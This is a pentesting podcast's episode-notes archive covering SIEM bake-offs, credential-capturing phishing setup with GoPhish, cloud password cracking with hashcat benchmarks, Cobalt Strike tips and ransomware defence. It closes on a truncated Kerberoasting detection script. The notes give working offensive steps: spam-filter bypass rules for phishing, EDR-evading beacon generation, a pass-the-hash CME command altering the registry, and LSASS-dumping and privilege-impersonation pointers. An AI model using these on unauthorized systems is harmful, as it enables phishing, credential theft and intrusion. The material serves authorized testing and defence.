    • Simple pricing model
    • Easy to use dashboard
    • Cool "marketplace" of integrations you can add to your instance and start getting alerts for
    • Nice API integration that seemed pretty simple to use - and that covers a lot of different cloud products and services
    • Ticket dashboard looked straightforward to use and interpret
    • Can quickly add IPs/subnets that you don't want to monitor, if appropriate

    7MS #483: Desperately Seeking a Super SIEM for SMBs - Part 2 Sep 01, 2021

    Today we continue our series we started recently (part 1 is here) about finding a super SIEM for SMBs. Specifically I have some updates on (and frustrations with) Arctic Wolf, Elastic, Milton Security and Perch Security.

    Here's the TLDL version:

    Arctic Wolf: They remain a strong contender in my bake-offs. They also could tick several boxes for an org as they offer continuous internal/external vulnerability scanning as well as a managed SOC. (And yes, I'm probably a tiny bit biased because I know a bunch of AWN's engineers and like the product)

    Elastic: I've loved my interactions with the sales folks and engineers at Elastic. My initial trial had some technical speed bumps (which Elastic helped me remedy). I eventually did get some Elastic agents enrolled on endpoints in my lab. However, now that I'm up and running (and admittedly I should go through the Webinars and online training), I'm feeling overwhelmed. There's a jillion menus and submenus to explore. I feel like I've been given a high-performance sports car but completely lack the knowledge on how to make the most of it. I'll keep Elastic in my back pocket, but I don't think I can feel comfortable handing this dashboard over to a SMB IT/security staff and have them run with it.

    Milton Security: A few weeks ago I had my first ever sales call with this group, and liked a lot of what I heard. They're up front about being a threat-hunt-as-a-service organization and they're not looking to partner with just any customer. The way they bundle sources of data (for the sake of pricing) makes sense to me, and although I haven't seen a formal quote from them yet, I think they will be reasonably priced when compared to some of the "big box" solutions.

    Perch Security: After part 1 of this series, several of you pinged me and said to check out Perch Security. I'm very excited to connect with them but had a tough time getting someone to respond to my inquiries (two weeks to be exact). Good news is I've got a call scheduled with them this week and am anxious to share what I learn about Perch on our next episode in this series.


    7MS #482: Creating Kick-Butt Credential-Capturing Phishing Campaigns - Part 3 Aug 26, 2021

    Today we're continuing our discussion on phishing campaigns - including a technical "gotcha" that might redirect your phishing emails into a digital black hole if you're not careful!

    As I mentioned last week, I've been heavy into spinning up and tearing down phishing campaigns, so I finally got around to documenting everything in episode 481.

    This week I ran into a bizarre issue where test phishes to myself suddenly disappeared from my Outlook altogether! After chatting with some folks on Slack I did a message trace in the Exchange Admin Center under:

    • Mail flow > Message Trace > Start a trace then make the Sender field be the user you're sending phishing emails from. That showed me that my phishes were being quarantined!

    To get around the quarantine, I went into Mail flow > Rules and then created a new rule with the following properties:

    • Apply this rule if > The sender's domain is > yourphishingdomain.com

    Then under Do the following:

    • Set the spam confidence level (SCL) to...Bypass spam filtering

    Under And, click the drop-down and choose:

    • Modify the message properties...set a message header...X-MS-Exchange-Organization-BypassClutter

    Then click where it says Enter text and change header value to True and click OK.


    7MS #481: Creating Kick-Butt Credential-Capturing Phishing Campaigns - Part 2 Aug 19, 2021

    Today we're revisiting how to make a kick-butt cred-capturing phishing campaign with Gophish, Amazon Lightsail, LetsEncrypt, ExpiredDomains.net and a special little extra something that makes creating phishing landing pages waaaaaaayyyyyyyyyy easier!

    For some quicker review, you can check out part 1 and also the complementary YouTube video, but I wanted to revisit this kick-butt process and update a few items:

    First, this SingleFile extension is amaaaaaaaazing for making phishing landing pages with ease!

    The process to get GApps (Google Workspace) to let you generate an app-specific password for use with GoPhish is kinda annoying. The steps below should get you going:

    • After domain registration, log into admin.google.com or click Manage Workspace button at checkout.

    • At the next screen click Workspace Admin Console. Sign in with the person you’ll be spoofing from, and the temporary password emailed to your backup email account during checkout.

    • In the search bar search for Less Secure Apps, choose Allow users to manage their access to less secure apps.

    • Now, in the upper right, hit Manage Your Google Account.

    • Under Security, click Protect your account and click Add phone number. Finish that process, then click Continue to your Google account.

    • Back at the main admin page, under Less secure app access, click Turn on access (not recommended).

    • At the next screen click Allow less secure apps: ON

    • Back at the main screen, click 2-Step Verification and set it to On.

    • Back at the main screen again, a new option called App passwords should be there. Click it. Choose to generate a custom name like LOL and then an app password will appear. Write it down as it only appears once!

    Finally, a quick reference for getting your LetsEncrypt cert to work with GoPhish. Get your LetsEncrypt cert generated, and then copy the full chain and the private key into the .crt and .key files GoPhish expects:

    cp /etc/letsencrypt/live/YOUR-DOMAIN/fullchain.pem ./domain.crt
    cp /etc/letsencrypt/live/YOUR-DOMAIN/privkey.pem ./domain.key

    Now go into the GoPhish config.json file and change cert_path and key_path to the files you just created, and set use_tls to true in both places in the config (the admin_server and phish_server sections) as well.


    7MS #480: Desperately Seeking a Super SIEM for SMBs Aug 12, 2021

    Today we're talking about the SIEM bake-off for SMBs that we've recently embarked on. We're currently evaluating several solutions - either for customer-facing purposes, internal kick-the-tires fun, or both.

    Candidates include:

    • Arctic Wolf
    • Elastic
    • Milton Security
    • Protocol46
    • Sumo Logic

    First we're starting by running each vendor through a series of questions, then likely following up with a demo where we'll run some technical tests and simulated hacking to see which vendor or vendors reign supreme!


    7MS #479: A Prelude to PwnTown Aug 06, 2021

    Hey friends, today we're talking about a new security training offering 7MinSec has created called Light Pentest LITE - Live Interactive Training Experience. It's a 3-day course (with each class session being 3 hours long) consisting of live (via Zoom), hands-on, instructor-led sessions that are focused on teaching you how to find, exploit and defend against common Active Directory weaknesses!

    Check out today's episode to learn more and get a hint for an OSINT exercise that will get you 10% off of a Light Pentest LITE training session!


    7MS #478: Password Cracking in the Cloud - Part 4 Jul 29, 2021

    Hey friends, today we're continuing our discussion of password cracking by sharing some methodology that has helped us get a high cred yield, and some tips on taking cracked passwords from multiple sources and Frankensteining them into a beautiful report for your customer.

    For some background, when 7MS started as a biz, we used to crack passwords in Paperspace but invested in an on-prem cracking rig a few years ago. That rig has been flipping sweet, but had some heating issues which prompted me to send the system in for warranty and use an awesome cracking rig in AWS in the meantime.

    Whether you're cracking locally or in the cloud, here's a quick methodology that has cracked many a hash for us:

    • Do a straight-up hashcat crack against the PwnedPasswords list (at time of this writing I don't have a good source for the cracked versions of these passwords. I used to grab them at hashes.org. Anybody got an alternative?)

    • Do a straight-up hashcat crack through the RockYou2021 list

    • Run the hatecrack methodology, including the quick crack, the quick crack with rules (I'm partial to OneRuleToRuleThemAll), and brute-forcing all 1-8 character passwords

    Once I'm ready to wrap up all the cracked passwords and put them in a nice shiny report for the customer, I do the following (using hashcombiner and pipal):

    # Run hash_combiner on hashcat's pot file and write results to a file
    python /opt/hc/hash_combiner.py user_hash /opt/hashcat/hashcat.potfile > /tmp/round1.txt
    # Run hash_combiner on hatecrack's pot file and write results to a file
    python /opt/hc/hash_combiner.py user_hash /opt/hatecrack/hashcat.pot > /tmp/round2.txt
    # Cat the two files together into a third file
    cat /tmp/round1.txt /tmp/round2.txt > /tmp/round3.txt
    # Sort and de-dupe the third file (-f folds case so the same cred isn't listed twice)
    sort -uf /tmp/round3.txt > /tmp/nice-and-clean.txt
    # Take just the passwords out of the "nice and clean" output (-f 2- keeps passwords that contain a colon intact)
    cut -d ':' -f 2- /tmp/nice-and-clean.txt > /tmp/pipal-temp.txt
    # Score the passwords using pipal
    /opt/pipal/pipal.rb /tmp/pipal-temp.txt > /tmp/pip-final.txt

    Now you've got a nice-and-clean.txt list of users and their cracked passwords, as well as the pip-final.txt with deeper analysis of cracked passwords, their commonalities, etc.


    7MS #477: Cobalt Strike for Newbs Jul 21, 2021

    Today we're talking about Cobalt Strike for newbs - including how to get it up and running, as well as some tools that will help you generate beacons while evading EDR at the same time!

    Some helpful things mentioned in today's episode:

    • Wherever you spin up your CS instance, it's probably a good idea to lock down the firewall to only specific IPs. With Digital Ocean, I found this article helpful.

    • When generating CS listeners, the C2Concealer from FortyNorth helped me get malleable C2 profiles generated while creating a LetsEncrypt cert at the same time!

    • My CS beacons kept getting gobbled by AV, but the following resources helped me get some stealthy ones generated: Artifact Kit, PEzor and ScareCrow. Here's a specific ScareCrow example that flew under the EDR radar:

    Scarecrow -I myrawshellcode.bin -etw -domain www.microsoft.com

    • PowerUpSQL is awesome for finding servers where you can run stored procedures to send your attacking box a priv'd hash to pass/capture/crack. Check out this presentation on PowerUpSQL to find vulnerable targets, then use mssql_ntlm_stealer module in Metasploit to have fun with the account hashes. Be sure to set your domain when configuring the Metasploit module!

    • When trying to pop an SMB shell with relay tools, I've had problems recently with those attempts being stopped by defensive tools. Then I found this gem which talks about tweaking smbexec.py to evade AV. It worked a treat!

    • I had no idea that MultiRelay includes an upload function, so you can simply upload your beacon.exe from a SYSTEM shell and fire it right from a command line. Cool!

    • Once my beacons started firing around the pentest environment, I temporarily allowed all IPs to talk to my Digital Ocean box - just because the IP I grabbed from a "what is my IP?" Google search didn't always match the actual beacons that called home. Once the beacon connectivity was established, I tweaked the beacon firewall rules to just let certain IPs in the door.

    • This Cobalt Strike Extension Kit was FREAKING sweet for adding "right click > do awesome stuff" functionality to CS like dump hashes, search for Kerberoastable accounts, setup persistence, etc.

    • Got a SYSTEM level shell but need to abuse a DA's privs? Tell the beacon to pull back a list of running processes, then click one (like explorer.exe) running under a DA's account and then impersonate it to add your account to the DA group!

    • Having issues dumping LSASS? This article from Red Canary gives you some great ideas to do it in a way that doesn't make AV throw a fit!

    • Trying to RDP using PtH? This article will help you out. And if you get warnings about not being able to RDP in because of some sort of login restriction, try adjusting this reg key with CME (setting DisableRestrictedAdmin to 0 turns Restricted Admin mode on, which is what lets the RDP logon accept a hash instead of a password):

    cme smb 10.1.2.3 -u Administrator -H THE-HASH-YOU-CAPTURED -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f'


    7MS #476: Tales of Pentest Pwnage - Part 28 Jul 16, 2021

    STOP! If you didn't listen to last week's episode (https://7ms.us/7ms-475-tales-of-internal-network-pentest-pwnage-part-27/) you might want to, since this was a two-part tale of pwnage. Either way I'll get you up to speed and talk about why this was (of course) one of my favorite pentests ever.


    7MS #475: Tales of Internal Network Pentest Pwnage - Part 27 Jul 08, 2021

    Yeahhhhhh! Today's another fun tale of pentest pwnage, including:

    • The importance of starting your pentest with an AD account that actually has access to...ya know...stuff

    • The importance of starting your pentest plugged into a network that actually has...you know...systems connected to it!

    • This BHIS article is awesome for finding treasures in SMB shares

    • PowerUpSQL audits are a powerful way to get pwnage on a pentest - check out this presentation for some practical how-to advice

    • IPMI/BMCs often have weak creds and/or auth bypasses so don't forget to check for them. Rapid7 has a slick blog on the topic.

    • Don't forget to check for vulnerable VMware versions because some of them have major vulnerabilities


    7MS #474: Password Cracking in the Cloud - Part 3 Jun 30, 2021

    Hey friends! Today we're dusting off an old mini-series about password cracking in the cloud (check out part 1 and part 2) and sharing some awesome info on building a monster of a cracking rig in AWS!

    One reason we haven't talked about password cracking in the cloud in a while is because back in winter of 2019 I built baby's first password cracking rig. Unfortunately, this week, Hashy (the name I gave to the rig) is overheating, and GPUs are impossible to find, so what's a pentester to do?

    Well, in today's episode I talk about this article from Sevnx which walks you through building a virtual password-cracking beast in the cloud. The article (complemented by a sweet video) will get you running in short order.

    WARNING: running this instance is super expensive (the author warns the instance would cost ~$9k/month if you left it running continuously).

    The steps are pretty straightforward, but between reboots I found that hashcat acted all wonky. Luckily, the article addresses that with this great tip:

    Pro tip: Save the Cuda download somewhere. If you ever turn your cracker off and get errors running hashcat when you turn it back on, re-run the install line. We think AWS sometimes refreshes the drivers or something and hashcat doesn't like it very much.

    If you need help installing one of my fave tools, hatecrack, check out my password cracking in the cloud gist. Also, our buddy Joe pointed me towards a utility called duplicut to help de-dupe large password-cracking wordlists.

    Once the AWS instance is set up, what kind of stats do we get out of this demon? Here's the result of hashcat -b:

    Hashmode: 0 - MD5
    Speed.#1.........: 55936.1 MH/s (47.79ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8
    Speed.#2.........: 55771.4 MH/s (47.94ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8
    Speed.#3.........: 55827.0 MH/s (47.88ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8
    Speed.#4.........: 55957.7 MH/s (47.78ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8
    Speed.#*.........: 223.5 GH/s

    Hashmode: 100 - SHA1
    Speed.#1.........: 17830.1 MH/s (75.08ms) @ Accel:16 Loops:1024 Thr:1024 Vec:1
    Speed.#2.........: 17774.0 MH/s (75.21ms) @ Accel:16 Loops:1024 Thr:1024 Vec:1
    Speed.#3.........: 17780.9 MH/s (75.26ms) @ Accel:16 Loops:1024 Thr:1024 Vec:1
    Speed.#4.........: 17795.6 MH/s (75.22ms) @ Accel:16 Loops:1024 Thr:1024 Vec:1
    Speed.#*.........: 71180.6 MH/s

    Hashmode: 1400 - SHA2-256
    Speed.#1.........: 7709.9 MH/s (86.84ms) @ Accel:8 Loops:1024 Thr:1024 Vec:1
    Speed.#2.........: 7718.3 MH/s (86.75ms) @ Accel:8 Loops:1024 Thr:1024 Vec:1
    Speed.#3.........: 7710.4 MH/s (86.75ms) @ Accel:8 Loops:1024 Thr:1024 Vec:1
    Speed.#4.........: 7694.4 MH/s (87.02ms) @ Accel:8 Loops:1024 Thr:1024 Vec:1
    Speed.#*.........: 30833.0 MH/s

    Hashmode: 1700 - SHA2-512
    Speed.#1.........: 2399.8 MH/s (69.70ms) @ Accel:8 Loops:256 Thr:1024 Vec:1
    Speed.#2.........: 2401.1 MH/s (69.68ms) @ Accel:8 Loops:256 Thr:1024 Vec:1
    Speed.#3.........: 2397.3 MH/s (69.78ms) @ Accel:8 Loops:256 Thr:1024 Vec:1
    Speed.#4.........: 2400.3 MH/s (69.70ms) @ Accel:8 Loops:256 Thr:1024 Vec:1
    Speed.#*.........: 9598.5 MH/s

    Hashmode: 22000 - WPA-PBKDF2-PMKID+EAPOL (Iterations: 4095)
    Speed.#1.........: 866.5 kH/s (94.23ms) @ Accel:16 Loops:256 Thr:1024 Vec:1
    Speed.#2.........: 866.7 kH/s (94.21ms) @ Accel:16 Loops:256 Thr:1024 Vec:1
    Speed.#3.........: 865.6 kH/s (94.30ms) @ Accel:16 Loops:256 Thr:1024 Vec:1
    Speed.#4.........: 866.7 kH/s (94.20ms) @ Accel:16 Loops:256 Thr:1024 Vec:1
    Speed.#*.........: 3465.5 kH/s

    Hashmode: 1000 - NTLM
    Speed.#1.........: 102.2 GH/s (26.05ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8
    Speed.#2.........: 102.3 GH/s (26.05ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8
    Speed.#3.........: 102.2 GH/s (26.07ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8
    Speed.#4.........: 102.3 GH/s (26.04ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8
    Speed.#*.........: 409.0 GH/s

    Hashmode: 3000 - LM
    Speed.#1.........: 41104.7 MH/s (64.74ms) @ Accel:512 Loops:1024 Thr:64 Vec:1
    Speed.#2.........: 40216.5 MH/s (66.11ms) @ Accel:512 Loops:1024 Thr:64 Vec:1
    Speed.#3.........: 40507.3 MH/s (65.89ms) @ Accel:512 Loops:1024 Thr:64 Vec:1
    Speed.#4.........: 39181.4 MH/s (68.13ms) @ Accel:512 Loops:1024 Thr:64 Vec:1
    Speed.#*.........: 161.0 GH/s

    Hashmode: 5500 - NetNTLMv1 / NetNTLMv1+ESS
    Speed.#1.........: 55861.0 MH/s (47.87ms) @ Accel:32 Loops:1024 Thr:1024 Vec:2
    Speed.#2.........: 55864.3 MH/s (47.87ms) @ Accel:32 Loops:1024 Thr:1024 Vec:2
    Speed.#3.........: 55519.4 MH/s (47.98ms) @ Accel:32 Loops:1024 Thr:1024 Vec:2
    Speed.#4.........: 55826.6 MH/s (47.89ms) @ Accel:32 Loops:1024 Thr:1024 Vec:2
    Speed.#*.........: 223.1 GH/s

    Hashmode: 5600 - NetNTLMv2
    Speed.#1.........: 3968.0 MH/s (84.37ms) @ Accel:4 Loops:1024 Thr:1024 Vec:1
    Speed.#2.........: 3968.1 MH/s (84.38ms) @ Accel:4 Loops:1024 Thr:1024 Vec:1
    Speed.#3.........: 3965.6 MH/s (84.38ms) @ Accel:4 Loops:1024 Thr:1024 Vec:1
    Speed.#4.........: 3967.8 MH/s (84.37ms) @ Accel:4 Loops:1024 Thr:1024 Vec:1
    Speed.#*.........: 15869.5 MH/s

    Hashmode: 1500 - descrypt, DES (Unix), Traditional DES
    Speed.#1.........: 1752.8 MH/s (95.32ms) @ Accel:32 Loops:1024 Thr:64 Vec:1
    Speed.#2.........: 1729.3 MH/s (96.65ms) @ Accel:32 Loops:1024 Thr:64 Vec:1
    Speed.#3.........: 1749.5 MH/s (95.53ms) @ Accel:32 Loops:1024 Thr:64 Vec:1
    Speed.#4.........: 1740.6 MH/s (96.01ms) @ Accel:32 Loops:1024 Thr:64 Vec:1
    Speed.#*.........: 6972.3 MH/s

    Hashmode: 500 - md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5) (Iterations: 1000)
    Speed.#1.........: 24882.8 kH/s (50.59ms) @ Accel:16 Loops:1000 Thr:1024 Vec:1
    Speed.#2.........: 24828.0 kH/s (50.60ms) @ Accel:16 Loops:1000 Thr:1024 Vec:1
    Speed.#3.........: 24865.7 kH/s (50.60ms) @ Accel:16 Loops:1000 Thr:1024 Vec:1
    Speed.#4.........: 24849.6 kH/s (50.59ms) @ Accel:16 Loops:1000 Thr:1024 Vec:1
    Speed.#*.........: 99426.0 kH/s

    Hashmode: 3200 - bcrypt $2*$, Blowfish (Unix) (Iterations: 32)
    Speed.#1.........: 69071 H/s (54.00ms) @ Accel:4 Loops:16 Thr:24 Vec:1
    Speed.#2.........: 68818 H/s (54.25ms) @ Accel:4 Loops:16 Thr:24 Vec:1
    Speed.#3.........: 68926 H/s (54.13ms) @ Accel:4 Loops:16 Thr:24 Vec:1
    Speed.#4.........: 69013 H/s (54.04ms) @ Accel:4 Loops:16 Thr:24 Vec:1
    Speed.#*.........: 275.8 kH/s

    Hashmode: 1800 - sha512crypt $6$, SHA512 (Unix) (Iterations: 5000)
    Speed.#1.........: 386.4 kH/s (84.04ms) @ Accel:8 Loops:256 Thr:1024 Vec:1
    Speed.#2.........: 377.9 kH/s (85.68ms) @ Accel:8 Loops:256 Thr:1024 Vec:1
    Speed.#3.........: 372.3 kH/s (86.76ms) @ Accel:8 Loops:256 Thr:1024 Vec:1
    Speed.#4.........: 382.7 kH/s (84.51ms) @ Accel:8 Loops:256 Thr:1024 Vec:1
    Speed.#*.........: 1519.3 kH/s

    Hashmode: 7500 - Kerberos 5, etype 23, AS-REQ Pre-Auth
    Speed.#1.........: 1177.0 MH/s (71.08ms) @ Accel:256 Loops:128 Thr:32 Vec:1
    Speed.#2.........: 1175.4 MH/s (71.17ms) @ Accel:256 Loops:128 Thr:32 Vec:1
    Speed.#3.........: 1171.5 MH/s (71.28ms) @ Accel:256 Loops:128 Thr:32 Vec:1
    Speed.#4.........: 1177.4 MH/s (71.05ms) @ Accel:256 Loops:128 Thr:32 Vec:1
    Speed.#*.........: 4701.3 MH/s

    Hashmode: 13100 - Kerberos 5, etype 23, TGS-REP
    Speed.#1.........: 1068.5 MH/s (78.29ms) @ Accel:32 Loops:1024 Thr:32 Vec:1
    Speed.#2.........: 1069.4 MH/s (78.25ms) @ Accel:32 Loops:1024 Thr:32 Vec:1
    Speed.#3.........: 1068.4 MH/s (78.32ms) @ Accel:32 Loops:1024 Thr:32 Vec:1
    Speed.#4.........: 1068.6 MH/s (78.29ms) @ Accel:32 Loops:1024 Thr:32 Vec:1
    Speed.#*.........: 4275.0 MH/s

    Hashmode: 15300 - DPAPI masterkey file v1 (Iterations: 23999)
    Speed.#1.........: 148.5 kH/s (93.95ms) @ Accel:8 Loops:512 Thr:1024 Vec:1
    Speed.#2.........: 148.4 kH/s (93.99ms) @ Accel:8 Loops:512 Thr:1024 Vec:1
    Speed.#3.........: 148.5 kH/s (93.96ms) @ Accel:8 Loops:512 Thr:1024 Vec:1
    Speed.#4.........: 148.4 kH/s (93.95ms) @ Accel:8 Loops:512 Thr:1024 Vec:1
    Speed.#*.........: 593.8 kH/s

    Hashmode: 15900 - DPAPI masterkey file v2 (Iterations: 12899)
    Speed.#1.........: 80610 H/s (80.47ms) @ Accel:4 Loops:256 Thr:1024 Vec:1
    Speed.#2.........: 80606 H/s (80.47ms) @ Accel:4 Loops:256 Thr:1024 Vec:1
    Speed.#3.........: 80596 H/s (80.48ms) @ Accel:4 Loops:256 Thr:1024 Vec:1
    Speed.#4.........: 80378 H/s (80.46ms) @ Accel:4 Loops:256 Thr:1024 Vec:1
    Speed.#*.........: 322.2 kH/s

    Hashmode: 7100 - macOS v10.8+ (PBKDF2-SHA512) (Iterations: 1023)
    Speed.#1.........: 1002.4 kH/s (78.60ms) @ Accel:32 Loops:31 Thr:1024 Vec:1
    Speed.#2.........: 1002.4 kH/s (78.60ms) @ Accel:32 Loops:31 Thr:1024 Vec:1
    Speed.#3.........: 1002.1 kH/s (78.62ms) @ Accel:32 Loops:31 Thr:1024 Vec:1
    Speed.#4.........: 1002.7 kH/s (78.58ms) @ Accel:32 Loops:31 Thr:1024 Vec:1
    Speed.#*.........: 4009.6 kH/s

    Hashmode: 11600 - 7-Zip (Iterations: 16384)
    Speed.#1.........: 897.6 kH/s (82.05ms) @ Accel:4 Loops:4096 Thr:1024 Vec:1
    Speed.#2.........: 896.4 kH/s (82.09ms) @ Accel:4 Loops:4096 Thr:1024 Vec:1
    Speed.#3.........: 893.3 kH/s (83.60ms) @ Accel:4 Loops:4096 Thr:1024 Vec:1
    Speed.#4.........: 912.4 kH/s (81.95ms) @ Accel:4 Loops:4096 Thr:1024 Vec:1
    Speed.#*.........: 3599.7 kH/s

    Hashmode: 12500 - RAR3-hp (Iterations: 262144)
    Speed.#1.........: 116.6 kH/s (60.91ms) @ Accel:16 Loops:16384 Thr:128 Vec:1
    Speed.#2.........: 111.4 kH/s (63.61ms) @ Accel:16 Loops:16384 Thr:128 Vec:1
    Speed.#3.........: 111.6 kH/s (63.63ms) @ Accel:16 Loops:16384 Thr:128 Vec:1
    Speed.#4.........: 115.0 kH/s (61.81ms) @ Accel:16 Loops:16384 Thr:128 Vec:1
    Speed.#*.........: 454.7 kH/s

    Hashmode: 13000 - RAR5 (Iterations: 32799)
    Speed.#1.........: 93248 H/s (54.69ms) @ Accel:16 Loops:128 Thr:1024 Vec:1
    Speed.#2.........: 93202 H/s (54.72ms) @ Accel:16 Loops:128 Thr:1024 Vec:1
    Speed.#3.........: 93009 H/s (54.70ms) @ Accel:16 Loops:128 Thr:1024 Vec:1
    Speed.#4.........: 93241 H/s (54.69ms) @ Accel:16 Loops:128 Thr:1024 Vec:1
    Speed.#*.........: 372.7 kH/s

    Hashmode: 6211 - TrueCrypt RIPEMD160 + XTS 512 bit (Iterations: 1999)
    Speed.#1.........: 672.2 kH/s (55.34ms) @ Accel:16 Loops:64 Thr:1024 Vec:1
    Speed.#2.........: 672.1 kH/s (55.34ms) @ Accel:16 Loops:64 Thr:1024 Vec:1
    Speed.#3.........: 671.4 kH/s (55.34ms) @ Accel:16 Loops:64 Thr:1024 Vec:1
    Speed.#4.........: 672.2 kH/s (55.34ms) @ Accel:16 Loops:64 Thr:1024 Vec:1
    Speed.#*.........: 2687.9 kH/s

    Hashmode: 13400 - KeePass 1 (AES/Twofish) and KeePass 2 (AES) (Iterations: 24569)
    Speed.#1.........: 111.2 kH/s (122.52ms) @ Accel:32 Loops:128 Thr:1024 Vec:1
    Speed.#2.........: 111.1 kH/s (122.55ms) @ Accel:32 Loops:128 Thr:1024 Vec:1
    Speed.#3.........: 111.2 kH/s (122.58ms) @ Accel:32 Loops:128 Thr:1024 Vec:1
    Speed.#4.........: 111.2 kH/s (122.52ms) @ Accel:32 Loops:128 Thr:1024 Vec:1
    Speed.#*.........: 444.7 kH/s

    Hashmode: 6800 - LastPass + LastPass sniffed (Iterations: 499)
    Speed.#1.........: 5944.3 kH/s (35.66ms) @ Accel:8 Loops:249 Thr:1024 Vec:1
    Speed.#2.........: 5942.0 kH/s (35.66ms) @ Accel:8 Loops:249 Thr:1024 Vec:1
    Speed.#3.........: 5939.0 kH/s (35.67ms) @ Accel:8 Loops:249 Thr:1024 Vec:1
    Speed.#4.........: 5943.8 kH/s (35.66ms) @ Accel:8 Loops:249 Thr:1024 Vec:1
    Speed.#*.........: 23769.0 kH/s

    Hashmode: 11300 - Bitcoin/Litecoin wallet.dat (Iterations: 200459)
    Speed.#1.........: 11370 H/s (73.48ms) @ Accel:2 Loops:1024 Thr:1024 Vec:1
    Speed.#2.........: 11355 H/s (73.50ms) @ Accel:2 Loops:1024 Thr:1024 Vec:1
    Speed.#3.........: 11369 H/s (73.49ms) @ Accel:2 Loops:1024 Thr:1024 Vec:1
    Speed.#4.........: 11370 H/s (73.49ms) @ Accel:2 Loops:1024 Thr:1024 Vec:1
    Speed.#*.........: 45464 H/s

    For a real world example, I had ~1,500 NTLM hashes to crack that I ran through some of the hatecrack methodology, and here's how the instance performed:

    • 100 LM hashes discovered, all cracked in 7 minutes (heh, 7 minutes :-)
    • Ran hatecrack's quick crack with no rules: done in 7 minutes, cracked 108 accounts
    • Quick crack against one rule to rule them all: ran in 25 minutes, got 271 new passwords
    • Ran the extensive hatecrack methodology: it ran for a little over 2 hours and got 88 new passwords.

    All said and done, about 1/3 of the passwords cracked in about 3 hours. Not bad!

    Don't forget, the second you're done with your cracking efforts, SHUT THE BOX DOWN! Otherwise you're in for a sour surprise come AWS billing day :-(

    On a few personal notes:

    • Last Comic Standing was the show I couldn't think of during the episode :-)

    • After a toxic non-toxic foam pit incident a few years ago, my family and I had another injury this weekend with a rented waterslide - the fun ended in a concussion!


    7MS #473: Interview with Nikhil Mittal Jun 24, 2021

    Hey everybody! Today Joe and I sat down with Nikhil Mittal of Pentester Academy and Altered Security to talk about a whole slew of fun security topics:

    • How Nikhil first got involved in Pentester Academy

    • Nikhil's hacker origin story

    • How does Nikhil feel about his tools being used by baddies?

    • What security tools/defenses would be good for SMBs to focus on?

    • Active Directory security - is all hope lost?

    • Will AI, ML, Terminator robots, etc. replace all of us who do pentesting for a living?



    7MS #472: Interview with Christopher Fielder Jun 16, 2021

    Today our good pal Christopher Fielder from Arctic Wolf is back for an interview three-peat! He joins Joe "The Machine" Skeen (a.k.a. Gh0sthax) and me to talk about all things ransomware, including:

    • How the Colonial Pipeline incident may have started from a weak VPN cred with no MFA. Silver lining (?) - they got some of the $ back.

    • Was the federal government's response good enough? What should the government be doing to better handle and manage ransomware?

    • Common ways ransomware gets in our environments, and some ways to NOT get ransomware'd:
      • Use 2FA (make sure that all accounts are using it!)
      • Consider having (if possible) your AD user scheme be something like chi-user4920394 instead of Joe.President
      • Have users that haven't logged in for X days get automatically locked out
      • Train your users - consider Arctic Wolf's managed security awareness offering
      • Detect early signs of compromise like Kerberoasting
      • Lock down your DNS egress to only specific servers so that it doesn't run "wide open"
      • Leverage good threat intel
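
    One way to act on the "detect early signs of compromise like Kerberoasting" point, as an added example that is not code from the episode or from Arctic Wolf: a small detector over Windows Security event 4769 (service ticket request) records, run here on constructed sample events. Kerberoasting shows up as one account requesting service tickets for many distinct SPNs in a short burst, usually with RC4 (etype 0x17) because those tickets are the cheapest to crack; the second rule below catches that pattern, and the first alerts on any ticket request for a decoy SPN registered on an unused account, which still fires when tooling asks for AES tickets instead of RC4. The field names, the decoy SPN, the 5-minute window and the threshold of 5 SPNs are assumptions to tune per environment; legacy services that still negotiate RC4 produce single-SPN noise that the threshold is meant to ignore:

```python
"""Flag likely Kerberoasting in Windows Security event 4769 (TGS request) records.

Added example, not code from the episode or from Arctic Wolf. It assumes the events have
already been parsed into a few fields (time, requesting user, service name, ticket
encryption type, status, client IP); the decoy SPN, window and threshold are assumed
starting points to tune per environment.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_ETYPE = "0x17"                       # RC4-HMAC, the etype Kerberoasting tools ask for
WINDOW = timedelta(minutes=5)
DISTINCT_SPN_THRESHOLD = 5
HONEY_SPNS = {"MSSQLSvc/honey-sql.corp.local:1433"}   # assumed decoy SPN on an unused account


def ev(t, user, service, etype=RC4_ETYPE, status="0x0", ip="10.0.1.77"):
    """Build one constructed 4769 record (all on a single made-up day)."""
    return {"time": f"2021-07-08T{t}", "user": user, "service": service,
            "etype": etype, "status": status, "ip": ip}


# Constructed sample events, not real logs.
SAMPLE_EVENTS = [
    ev("09:00:00", "jdoe", "MSSQLSvc/db01.corp.local:1433", etype="0x12", ip="10.0.1.20"),  # AES, normal
    ev("09:05:00", "legacyapp", "HTTP/legacy.corp.local", ip="10.0.1.30"),   # one RC4 ticket, legacy noise
    ev("09:10:00", "pwned.user", "MSSQLSvc/db01.corp.local:1433"),
    ev("09:10:00", "pwned.user", "MSSQLSvc/db02.corp.local:1433"),
    ev("09:10:01", "pwned.user", "HTTP/intranet.corp.local"),
    ev("09:10:01", "pwned.user", "HTTP/legacy.corp.local"),
    ev("09:10:02", "pwned.user", "CIFS/fs01.corp.local"),
    ev("09:10:02", "pwned.user", "MSSQLSvc/db01.corp.local:1433"),             # repeat, not a new SPN
    ev("09:10:03", "pwned.user", "MSSQLSvc/honey-sql.corp.local:1433", etype="0x12"),  # decoy, AES
    ev("09:10:04", "pwned.user", "krbtgt/CORP.LOCAL"),                         # TGT traffic, ignored
    ev("09:10:05", "pwned.user", "exchangeMDB/mail01.corp.local"),
    ev("09:30:00", "WS01$", "WS02$", ip="10.0.1.50"),                          # computer account, ignored
]


def is_candidate(e):
    """Successful RC4 TGS request for a service that is not krbtgt or a computer account."""
    svc = e["service"]
    return (e["etype"].lower() == RC4_ETYPE and e["status"] == "0x0"
            and not svc.endswith("$") and not svc.lower().startswith("krbtgt"))


def detect(events):
    """Return alerts from two rules; rule 1 catches AES-only roasting that rule 2 misses."""
    alerts = []
    # Rule 1: any ticket request for a decoy SPN is an alert, whatever the etype.
    for e in events:
        if e["service"] in HONEY_SPNS:
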